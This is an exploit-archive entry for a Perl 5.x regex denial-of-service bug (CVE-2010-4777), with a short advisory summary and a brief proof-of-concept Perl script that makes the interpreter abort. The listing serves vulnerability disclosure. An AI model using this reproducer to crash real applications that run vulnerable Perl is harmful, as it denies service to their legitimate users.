Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service
| EKU-ID: 40108 | CVE: CVE-2010-4777;OSVDB-74745 | OSVDB-ID: |
| Author: Vladimir Perepelitsa | Published: 2011-03-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 40108 | CVE: CVE-2010-4777;OSVDB-74745 | OSVDB-ID: |
| Author: Vladimir Perepelitsa | Published: 2011-03-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/47006/info
Perl is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.
#!/usr/bin/perl
my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}